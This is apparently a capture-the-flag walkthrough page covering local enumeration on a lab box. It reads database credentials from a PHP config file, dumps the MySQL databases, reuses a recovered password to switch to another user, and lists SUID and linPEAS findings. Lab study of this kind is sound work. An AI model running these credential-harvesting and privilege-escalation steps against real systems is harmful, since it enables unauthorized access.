3 box enum www-data

www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

# mysql is not installed?
# tried su didnt work

www-data@ubuntu:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash

# mysqldump exists

www-data@ubuntu:/tmp$ mysqldump -u theseus -p --all-databases> dump.mysql

# from dump.mysql
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
# theseus:Th3s3usW4sK1ng works

SuidEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/sysinfo
------------------------------

ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
# we need to become theseus to use SUID

PEAS

╣ Sudo version
Sudo version 1.8.21p2
# tried; not exploitable

╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME                                       PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION
org.gnome.DisplayManager                  1082 gdm3            root             :1.18         gdm.service               -          -
 -- UID=0 EUID=0

╣ Active Ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -

╣ Users with console
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

Previous4 privesc theseus > root Next2 :80

Last updated 4 years ago